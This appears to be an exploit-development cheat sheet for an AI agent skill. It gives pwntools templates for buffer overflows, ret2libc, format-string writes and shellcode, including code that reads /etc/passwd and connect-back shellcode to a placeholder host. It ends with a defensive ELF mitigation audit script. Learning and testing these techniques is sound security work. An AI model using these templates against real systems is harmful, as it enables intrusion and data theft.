
# Exploit Development Expert

## Binary Exploitation Basics

### Buffer Overflow

```python
from pwn import *

# Find the offset to the saved return address
cyclic(200)              # Generate a 200-byte De Bruijn pattern to send as input
cyclic_find(0x61616166)  # Map the value that ended up in the crashing register back to its offset

# Basic exploit: pad up to the saved return address, then overwrite it
offset = 64
ret_addr = p64(0x401234)
payload = b'A' * offset + ret_addr

# With NX bypass (ret2libc): reuse existing libc code instead of injecting shellcode
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
system = libc.symbols['system']           # Offset within libc until libc.address is set from a leak
bin_sh = next(libc.search(b'/bin/sh'))    # Offset of a "/bin/sh" string inside libc
```

### Format String

```python
from pwn import *

# Read from the stack: dump 20 values to see where the input buffer lands
payload = b'%x.' * 20
payload = b'%7$s'          # Read the value at one specific argument position (here the 7th)

# Write to an address: pwntools builds the %n-based write sequence
offset = 7                 # Argument index at which the controlled buffer starts (found via the probe above)
target_addr = 0x404040     # Placeholder address; substitute the real one
value = 0xdeadbeef         # Placeholder value to write
payload = fmtstr_payload(offset, {target_addr: value})
```

### Shellcode

```python
from pwn import *

# Using pwntools
context.arch = 'amd64'
shellcode = asm(shellcraft.sh())   # shellcraft returns assembly source; asm() turns it into bytes

# Common shellcodes
shellcraft.sh()                    # /bin/sh
shellcraft.cat('/etc/passwd')
IP, PORT = '127.0.0.1', 4444       # Placeholders; substitute the real host and port
shellcraft.connect(IP, PORT)
```

## Pwntools Essentials

```python
from pwn import *

# Setup
context.binary = ELF('./vuln')   # Sets arch, bits and endianness from the target binary
context.log_level = 'debug'      # Print every byte sent and received

# Connection (pick one)
p = process('./vuln')      # Local
p = remote('ip', port)     # Remote; 'ip' and port are placeholders
p = gdb.debug('./vuln')    # Local, with GDB attached from the start

# I/O
payload = b'A' * 64        # Whatever input you built above
p.sendline(payload)
p.recvuntil(b'>')
data = p.recv(100)

# Interactive
p.interactive()
```

## GDB Commands

```
gdb ./binary
> checksec                # Security features (provided by pwndbg/GEF, not stock GDB)
> info functions          # List functions
> disas main              # Disassemble
> b *0x401234             # Breakpoint
> r < payload.txt         # Run with input
> x/20wx $rsp             # Examine stack
```
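The `checksec` output above is derived from the ELF headers alone, which is also what a build pipeline can verify before a binary ships. The following is an added example, not part of the antigravity-kit skill and not pwntools code: a pure-Python audit that reads the program headers the way `checksec` does, reporting NX (no `PF_X` on `PT_GNU_STACK`), PIE (`e_type == ET_DYN`) and RELRO (`PT_GNU_RELRO` present, full when the dynamic section carries a BIND_NOW flag). The constants are assumed from `elf.h`, `build_sample_elf` is a constructed header-only image used as test input, and stack-canary detection is left out because it needs the symbol table rather than the headers.

```python
import struct
import sys

# ELF64 constants (assumed from the ELF specification / elf.h)
ET_EXEC, ET_DYN = 2, 3
PT_DYNAMIC = 2
PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1


def parse_program_headers(data):
    """Return (e_type, [(p_type, p_flags, p_offset, p_filesz), ...]) for a little-endian ELF64 image."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    if data[4] != 2 or data[5] != 1:
        raise ValueError("only little-endian ELF64 is handled here")
    (e_type,) = struct.unpack_from("<H", data, 16)
    (e_phoff,) = struct.unpack_from("<Q", data, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    phdrs = []
    for i in range(e_phnum):
        p_type, p_flags, p_offset, _vaddr, _paddr, p_filesz, _memsz, _align = struct.unpack_from(
            "<IIQQQQQQ", data, e_phoff + i * e_phentsize)
        phdrs.append((p_type, p_flags, p_offset, p_filesz))
    return e_type, phdrs


def has_bind_now(data, dyn_offset, dyn_size):
    """Scan PT_DYNAMIC entries for a BIND_NOW marker (what turns partial RELRO into full RELRO)."""
    for pos in range(dyn_offset, dyn_offset + dyn_size, 16):
        tag, val = struct.unpack_from("<QQ", data, pos)
        if tag == DT_NULL:
            break
        if tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW) or (tag == DT_FLAGS_1 and val & DF_1_NOW):
            return True
    return False


def audit_mitigations(data):
    """Report NX, PIE and RELRO the way checksec derives them from the ELF headers."""
    e_type, phdrs = parse_program_headers(data)
    stack_flags = [f for t, f, _, _ in phdrs if t == PT_GNU_STACK]
    # No PT_GNU_STACK at all means the loader falls back to an executable stack
    nx = bool(stack_flags) and not (stack_flags[0] & PF_X)
    pie = e_type == ET_DYN
    relro = "none"
    if any(t == PT_GNU_RELRO for t, _, _, _ in phdrs):
        relro = "partial"
        if any(t == PT_DYNAMIC and has_bind_now(data, off, size) for t, _, off, size in phdrs):
            relro = "full"
    return {"nx": nx, "pie": pie, "relro": relro}


def build_sample_elf(nx=True, pie=True, relro="full"):
    """Constructed test input: a header-only ELF64 image with the requested mitigation flags."""
    dyn = [(DT_FLAGS, DF_BIND_NOW)] if relro == "full" else []
    dyn_blob = b"".join(struct.pack("<QQ", t, v) for t, v in dyn + [(DT_NULL, 0)])
    entries = [(PT_GNU_STACK, (PF_R | PF_W) | (0 if nx else PF_X), 0, 0)]
    if relro != "none":
        entries.append((PT_GNU_RELRO, PF_R, 0, 0))
    dyn_off = 64 + 56 * (len(entries) + 1)          # dynamic section follows the program headers
    entries.append((PT_DYNAMIC, PF_R | PF_W, dyn_off, len(dyn_blob)))
    ehdr = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # ELFCLASS64, little-endian, version 1
    ehdr += struct.pack("<HHIQQQIHHHHHH", ET_DYN if pie else ET_EXEC, 62, 1, 0, 64, 0, 0,
                        64, 56, len(entries), 64, 0, 0)
    phdrs = b"".join(struct.pack("<IIQQQQQQ", t, f, off, off, off, size, size, 8)
                     for t, f, off, size in entries)
    return ehdr + phdrs + dyn_blob


if __name__ == "__main__":
    # Audit a real binary if a path is given, otherwise the constructed sample
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_elf()
    print(audit_mitigations(image))
```

Run it as `python3 audit.py ./vuln` to check a real build; a binary reporting `nx: False` or `relro: "none"` was linked without the hardening flags (`-z noexecstack`, `-z relro -z now`) that the GDB `checksec` line above would flag.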
First seen: Jan 27, 2026